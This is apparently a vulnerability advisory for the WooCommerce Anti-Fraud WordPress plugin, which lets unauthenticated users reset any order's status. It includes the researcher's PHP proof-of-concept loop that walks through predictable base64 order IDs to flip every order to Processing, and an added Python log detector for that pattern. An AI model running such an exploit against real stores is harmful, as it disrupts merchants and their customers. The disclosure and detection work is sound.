The WooCommerce Anti-Fraud WordPress plugin was affected by an issue where an unauthenticated user could change the order status of any order, as no authorization checks were performed when changing the order status. The order_id parameter was also predictable. On an individual level, a customer who has already received an order could set its status back to Processing, which may have unintended consequences, such as being able to claim that the order has not been shipped yet. On a larger scale, order IDs can be iterated from 1 upward and every order on the site can be set to Processing, requiring remediation by the store owner before business can continue. According to the original researcher, the vendor was contacted but stated that the issue would not be fixed.
<?php
// Original researcher's proof of concept: every request to the
// paypal_verification endpoint flips the corresponding order to Processing.
$site = "https://woocommerce-store-with-anti-fraud-installed.com";

for ( $order_id = 1; $order_id <= PHP_INT_MAX; $order_id++ ) {
    // The plugin expects the order id base64-encoded in the query string.
    $order_64 = base64_encode( $order_id );
    $url      = "{$site}/?order_id={$order_64}&paypal_verification=true";

    // A plain unauthenticated GET is enough; the response body is discarded.
    $handle = fopen( $url, 'r' );
    fclose( $handle );
}
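Added example (not part of the original advisory or the plugin's code): a defender-side detector that scans web server access logs for the request pattern shown above and flags clients that walk through many order IDs. The combined log format and the client addresses are assumptions, and the log lines are constructed for the example.

```python
"""Detect mass order-status tampering attempts against the WooCommerce
Anti-Fraud endpoint by scanning access logs for the
?order_id=<base64>&paypal_verification=true request pattern."""
import base64
import binascii
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Apache/nginx "combined" format (assumed): client IP, then the quoted request line.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*"')

def decode_order_id(target):
    """Return the integer order_id from a request target if it carries the
    paypal_verification=true marker, otherwise None."""
    qs = parse_qs(urlsplit(target).query)
    if qs.get("paypal_verification", [""])[0] != "true":
        return None
    try:
        raw = base64.b64decode(qs.get("order_id", [""])[0], validate=True)
        return int(raw)
    except (binascii.Error, ValueError):
        return None

def find_enumeration(log_lines, min_orders=5):
    """Group hits per client IP and flag IPs that touched at least
    min_orders distinct orders. Returns {ip: sorted list of order ids}."""
    hits = defaultdict(set)
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        oid = decode_order_id(m.group("target"))
        if oid is not None:
            hits[m.group("ip")].add(oid)
    return {ip: sorted(ids) for ip, ids in hits.items() if len(ids) >= min_orders}

def is_sequential(order_ids):
    """True when the ids form an unbroken ascending run, as the PoC loop produces."""
    return order_ids == list(range(order_ids[0], order_ids[0] + len(order_ids)))

# Constructed sample: one client walks orders 1..6, another makes a single hit.
SAMPLE_LOG = [
    f'203.0.113.7 - - [22/Nov/2020:10:00:{i:02d} +0000] "GET /?order_id='
    f'{base64.b64encode(str(i).encode()).decode()}&paypal_verification=true HTTP/1.1" 200 512'
    for i in range(1, 7)
] + ['198.51.100.4 - - [22/Nov/2020:10:01:00 +0000] "GET /?order_id=NDI=&paypal_verification=true HTTP/1.1" 200 512']

if __name__ == "__main__":
    for ip, ids in find_enumeration(SAMPLE_LOG).items():
        print(ip, ids, "sequential" if is_sequential(ids) else "scattered")
```

Requests to this endpoint with a valid session or a nonce would not look different in the access log, so the per-client volume and the sequential pattern are the signal, not the individual request.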
Brian Henry
Brian Henry
No
2020-11-22
2020-11-23
2020-11-24